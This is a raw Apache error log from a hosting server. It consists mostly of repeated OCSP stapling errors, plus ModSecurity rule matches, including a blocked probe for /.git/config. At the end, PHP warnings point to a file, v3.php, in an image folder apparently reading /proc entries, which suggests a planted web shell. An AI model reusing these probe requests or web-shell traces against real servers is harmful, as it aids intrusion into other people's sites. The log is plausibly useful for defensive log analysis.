[Tue May 12 05:52:35.365963 2026] [ssl:error] [pid 1820198:tid 1820216] (EAI 2)Name or service not known: [client 158.173.36.80:42247] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:35.365996 2026] [ssl:error] [pid 1820198:tid 1820216] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:35.710710 2026] [ssl:error] [pid 1844863:tid 1844870] (EAI 2)Name or service not known: [client 158.173.36.31:57377] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:35.710735 2026] [ssl:error] [pid 1844863:tid 1844870] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:36.055254 2026] [ssl:error] [pid 1842385:tid 1842400] (EAI 2)Name or service not known: [client 158.173.36.160:29097] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:36.055288 2026] [ssl:error] [pid 1842385:tid 1842400] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:36.408768 2026] [ssl:error] [pid 1808852:tid 1808866] (EAI 2)Name or service not known: [client 158.173.36.240:64973] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:36.408805 2026] [ssl:error] [pid 1808852:tid 1808866] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:36.821462 2026] [ssl:error] [pid 1825179:tid 1825198] (EAI 2)Name or service not known: [client 158.173.36.31:63951] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:36.821491 2026] [ssl:error] [pid 1825179:tid 1825198] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:37.202604 2026] [ssl:error] [pid 1844863:tid 1844869] (EAI 2)Name or service not known: [client 158.173.36.49:47849] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:37.202642 2026] [ssl:error] [pid 1844863:tid 1844869] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:37.628857 2026] [ssl:error] [pid 1842385:tid 1842403] (EAI 2)Name or service not known: [client 158.173.36.217:62877] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:37.628928 2026] [ssl:error] [pid 1842385:tid 1842403] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:38.004713 2026] [ssl:error] [pid 1825287:tid 1825319] (EAI 2)Name or service not known: [client 158.173.36.68:58895] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:38.004752 2026] [ssl:error] [pid 1825287:tid 1825319] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:38.355428 2026] [ssl:error] [pid 1808852:tid 1808877] (EAI 2)Name or service not known: [client 158.173.36.57:35027] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:38.355469 2026] [ssl:error] [pid 1808852:tid 1808877] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:38.725585 2026] [ssl:error] [pid 1825179:tid 1825211] (EAI 2)Name or service not known: [client 158.173.36.124:30059] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:38.725617 2026] [ssl:error] [pid 1825179:tid 1825211] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:39.066093 2026] [ssl:error] [pid 1844863:tid 1844881] (EAI 2)Name or service not known: [client 158.173.36.85:49471] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:39.066125 2026] [ssl:error] [pid 1844863:tid 1844881] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:39.409713 2026] [ssl:error] [pid 1825287:tid 1825313] (EAI 2)Name or service not known: [client 158.173.36.71:47757] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:39.409750 2026] [ssl:error] [pid 1825287:tid 1825313] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:39.798508 2026] [ssl:error] [pid 1825179:tid 1825206] (EAI 2)Name or service not known: [client 158.173.36.171:53499] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:39.798547 2026] [ssl:error] [pid 1825179:tid 1825206] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:40.173393 2026] [ssl:error] [pid 1820198:tid 1820221] (EAI 2)Name or service not known: [client 158.173.36.241:26495] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:40.173427 2026] [ssl:error] [pid 1820198:tid 1820221] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:40.524336 2026] [ssl:error] [pid 1844863:tid 1844886] (EAI 2)Name or service not known: [client 158.173.36.70:34325] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:40.524372 2026] [ssl:error] [pid 1844863:tid 1844886] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:40.906721 2026] [ssl:error] [pid 1825287:tid 1825321] (EAI 2)Name or service not known: [client 158.173.36.245:46131] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:40.906758 2026] [ssl:error] [pid 1825287:tid 1825321] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:41.257810 2026] [ssl:error] [pid 1808852:tid 1808861] (EAI 2)Name or service not known: [client 158.173.36.49:58779] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:41.257850 2026] [ssl:error] [pid 1808852:tid 1808861] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:41.656721 2026] [ssl:error] [pid 1825179:tid 1825208] (EAI 2)Name or service not known: [client 158.173.36.12:31029] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:41.656762 2026] [ssl:error] [pid 1825179:tid 1825208] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:42.011510 2026] [ssl:error] [pid 1820198:tid 1820213] (EAI 2)Name or service not known: [client 158.173.36.49:61225] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:42.011542 2026] [ssl:error] [pid 1820198:tid 1820213] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:42.358031 2026] [ssl:error] [pid 1844863:tid 1844889] (EAI 2)Name or service not known: [client 158.173.36.241:56877] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:42.358076 2026] [ssl:error] [pid 1844863:tid 1844889] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:42.873595 2026] [ssl:error] [pid 1808852:tid 1808871] (EAI 2)Name or service not known: [client 158.173.36.70:37891] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:42.873630 2026] [ssl:error] [pid 1808852:tid 1808871] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:43.250431 2026] [ssl:error] [pid 1825179:tid 1825222] (EAI 2)Name or service not known: [client 158.173.36.68:60823] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:43.250456 2026] [ssl:error] [pid 1825179:tid 1825222] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:43.601305 2026] [ssl:error] [pid 1825287:tid 1825308] (EAI 2)Name or service not known: [client 158.173.36.12:41281] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:43.601340 2026] [ssl:error] [pid 1825287:tid 1825308] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:43.956413 2026] [ssl:error] [pid 1825179:tid 1825213] (EAI 2)Name or service not known: [client 158.173.36.68:29497] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:43.956442 2026] [ssl:error] [pid 1825179:tid 1825213] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:44.341602 2026] [ssl:error] [pid 1842385:tid 1842395] (EAI 2)Name or service not known: [client 158.173.36.12:29957] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:44.341635 2026] [ssl:error] [pid 1842385:tid 1842395] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:44.713176 2026] [ssl:error] [pid 1825287:tid 1825312] (EAI 2)Name or service not known: [client 158.173.36.161:24655] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:44.713202 2026] [ssl:error] [pid 1825287:tid 1825312] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:45.112406 2026] [ssl:error] [pid 1825179:tid 1825204] (EAI 2)Name or service not known: [client 158.173.36.4:31489] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:45.112440 2026] [ssl:error] [pid 1825179:tid 1825204] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:45.505309 2026] [ssl:error] [pid 1820198:tid 1820206] (EAI 2)Name or service not known: [client 158.173.36.31:22469] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:45.505348 2026] [ssl:error] [pid 1820198:tid 1820206] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:45.909964 2026] [ssl:error] [pid 1844863:tid 1844873] (EAI 2)Name or service not known: [client 158.173.36.245:46453] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:45.910004 2026] [ssl:error] [pid 1844863:tid 1844873] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:46.301359 2026] [ssl:error] [pid 1842385:tid 1842393] (EAI 2)Name or service not known: [client 158.173.36.12:24341] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:46.301400 2026] [ssl:error] [pid 1842385:tid 1842393] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:46.710997 2026] [ssl:error] [pid 1808852:tid 1808857] (EAI 2)Name or service not known: [client 158.173.36.49:27015] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:46.711028 2026] [ssl:error] [pid 1808852:tid 1808857] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:47.063609 2026] [ssl:error] [pid 1820198:tid 1820215] (EAI 2)Name or service not known: [client 158.173.36.161:49651] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:47.063647 2026] [ssl:error] [pid 1820198:tid 1820215] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:47.450559 2026] [ssl:error] [pid 1844863:tid 1844887] (EAI 2)Name or service not known: [client 158.173.36.169:34839] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:47.450596 2026] [ssl:error] [pid 1844863:tid 1844887] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:47.812598 2026] [ssl:error] [pid 1842385:tid 1842409] (EAI 2)Name or service not known: [client 158.173.36.169:56379] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:47.812637 2026] [ssl:error] [pid 1842385:tid 1842409] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:48.163124 2026] [ssl:error] [pid 1825287:tid 1825329] (EAI 2)Name or service not known: [client 158.173.36.241:20601] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:48.163162 2026] [ssl:error] [pid 1825287:tid 1825329] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:48.505640 2026] [ssl:error] [pid 1825179:tid 1825217] (EAI 2)Name or service not known: [client 158.173.36.171:45603] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:48.505674 2026] [ssl:error] [pid 1825179:tid 1825217] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:48.851668 2026] [ssl:error] [pid 1820198:tid 1820211] (EAI 2)Name or service not known: [client 158.173.36.124:53839] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:48.851702 2026] [ssl:error] [pid 1820198:tid 1820211] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:49.200929 2026] [ssl:error] [pid 1842385:tid 1842392] (EAI 2)Name or service not known: [client 158.173.36.57:39863] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:49.200956 2026] [ssl:error] [pid 1842385:tid 1842392] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:49.548420 2026] [ssl:error] [pid 1825287:tid 1825310] (EAI 2)Name or service not known: [client 158.173.36.161:47005] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:49.548441 2026] [ssl:error] [pid 1825287:tid 1825310] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:49.906997 2026] [ssl:error] [pid 1825179:tid 1825214] (EAI 2)Name or service not known: [client 158.173.36.240:23029] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:49.907025 2026] [ssl:error] [pid 1825179:tid 1825214] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:50.255573 2026] [ssl:error] [pid 1820198:tid 1820223] (EAI 2)Name or service not known: [client 158.173.36.241:25703] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:50.255615 2026] [ssl:error] [pid 1820198:tid 1820223] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:50.616833 2026] [ssl:error] [pid 1844863:tid 1844892] (EAI 2)Name or service not known: [client 158.173.36.210:21125] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:50.616873 2026] [ssl:error] [pid 1844863:tid 1844892] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:51.035033 2026] [ssl:error] [pid 1842385:tid 1842394] (EAI 2)Name or service not known: [client 158.173.36.31:35143] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:51.035072 2026] [ssl:error] [pid 1842385:tid 1842394] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:52.613322 2026] [ssl:error] [pid 1808852:tid 1808862] (EAI 2)Name or service not known: [client 158.173.36.134:50653] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:52.613365 2026] [ssl:error] [pid 1808852:tid 1808862] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:53.013999 2026] [ssl:error] [pid 1820198:tid 1820200] (EAI 2)Name or service not known: [client 158.173.36.161:29589] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:53.014035 2026] [ssl:error] [pid 1820198:tid 1820200] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:53.398959 2026] [ssl:error] [pid 1844863:tid 1844879] (EAI 2)Name or service not known: [client 158.173.36.45:28031] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:53.398993 2026] [ssl:error] [pid 1844863:tid 1844879] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:53.914419 2026] [ssl:error] [pid 1842385:tid 1842390] (EAI 2)Name or service not known: [client 158.173.36.164:48273] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:53.914456 2026] [ssl:error] [pid 1842385:tid 1842390] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:54.311182 2026] [ssl:error] [pid 1820198:tid 1820220] (EAI 2)Name or service not known: [client 158.173.36.164:30917] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:54.311211 2026] [ssl:error] [pid 1820198:tid 1820220] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:54.653487 2026] [ssl:error] [pid 1842385:tid 1842397] (EAI 2)Name or service not known: [client 158.173.36.124:64269] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:54.653523 2026] [ssl:error] [pid 1842385:tid 1842397] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:55.004572 2026] [ssl:error] [pid 1820198:tid 1820207] (EAI 2)Name or service not known: [client 158.173.36.241:48579] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:55.004606 2026] [ssl:error] [pid 1820198:tid 1820207] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:55.399748 2026] [ssl:error] [pid 1844863:tid 1844880] (EAI 2)Name or service not known: [client 158.173.36.80:36361] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:55.399786 2026] [ssl:error] [pid 1844863:tid 1844880] AH01941: stapling_renew_response: responder error
[Tue May 12 05:52:55.810282 2026] [ssl:error] [pid 1842385:tid 1842408] (EAI 2)Name or service not known: [client 158.173.36.49:62267] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:52:55.810320 2026] [ssl:error] [pid 1842385:tid 1842408] AH01941: stapling_renew_response: responder error
[Tue May 12 05:53:01.747329 2026] [security2:error] [pid 1808852:tid 1808875] [client 43.133.253.253:47046] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2023/02/Echo-Narcisse-et-lart-daimer-extrait-6.mp3"] [unique_id "agKkHRfeipD4uoG21Fo44gAAABQ"]
[Tue May 12 05:53:24.514283 2026] [security2:error] [pid 1820198:tid 1820215] [client 65.49.1.66:45714] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agKkNM1tk6y7yBJLpJo-WgAAAI8"]
[Tue May 12 05:53:24.514632 2026] [security2:error] [pid 1820198:tid 1820215] [client 65.49.1.66:45714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agKkNM1tk6y7yBJLpJo-WgAAAI8"]
[Tue May 12 05:53:24.515153 2026] [security2:error] [pid 1820198:tid 1820215] [client 65.49.1.66:45714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agKkNM1tk6y7yBJLpJo-WgAAAI8"]
[Tue May 12 05:54:04.013226 2026] [security2:error] [pid 1844863:tid 1844885] [client 43.156.156.96:50344] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.classist.fr"] [uri "/"] [unique_id "agKkXPaAnTZtx1_H_wy93gAAAVA"]
[Tue May 12 05:54:11.612743 2026] [security2:error] [pid 1825287:tid 1825319] [client 18.215.49.176:7830] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/sexynakedfemales.com"] [unique_id "agKkYwgpmE1yW0glLdg0LwAAAM4"]
[Tue May 12 05:54:11.613122 2026] [security2:error] [pid 1825287:tid 1825319] [client 18.215.49.176:7830] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/sexynakedfemales.com"] [unique_id "agKkYwgpmE1yW0glLdg0LwAAAM4"]
[Tue May 12 05:54:11.613356 2026] [security2:error] [pid 1825287:tid 1825319] [client 18.215.49.176:7830] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/sexynakedfemales.com"] [unique_id "agKkYwgpmE1yW0glLdg0LwAAAM4"]
[Tue May 12 05:54:16.418586 2026] [security2:error] [pid 1844863:tid 1844893] [client 43.164.196.47:37872] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/"] [unique_id "agKkaPaAnTZtx1_H_wy97wAAAVg"]
[Tue May 12 05:54:19.560547 2026] [security2:error] [pid 1820198:tid 1820215] [client 43.164.196.47:46316] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/dev/"] [unique_id "agKka81tk6y7yBJLpJo-igAAAI8"], referer: http://dev.rentparadise.fr
[Tue May 12 05:54:19.561546 2026] [core:error] [pid 1820198:tid 1820215] [client 43.164.196.47:46316] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Tue May 12 05:54:19.561562 2026] [core:error] [pid 1820198:tid 1820215] [client 43.164.196.47:46316] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Tue May 12 05:54:48.344995 2026] [ssl:error] [pid 1808852:tid 1808868] (EAI 2)Name or service not known: [client 205.169.39.8:26339] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Tue May 12 05:54:48.345048 2026] [ssl:error] [pid 1808852:tid 1808868] AH01941: stapling_renew_response: responder error
[Tue May 12 05:55:37.944828 2026] [security2:error] [pid 1844863:tid 1844878] [client 123.207.65.62:51122] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agKkufaAnTZtx1_H_wy-NwAAAUk"]
[Tue May 12 05:55:46.826490 2026] [security2:error] [pid 1825179:tid 1825198] [client 123.207.65.62:38128] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agKkwtr1yOh9TvizezimEQAAAEE"], referer: http://rixonephotography.com
[Tue May 12 05:56:03.153497 2026] [security2:error] [pid 1842385:tid 1842399] [client 43.135.138.128:39788] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tchatbooster.com"] [uri "/"] [unique_id "agKk0xs7kySIUZ3ORnIuEAAAAQk"]
[Tue May 12 05:56:05.601455 2026] [security2:error] [pid 1825287:tid 1825322] [client 43.135.138.128:47158] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKk1QgpmE1yW0glLdg0mgAAANE"], referer: http://tchatbooster.com
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706011/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1706011/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1706011/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
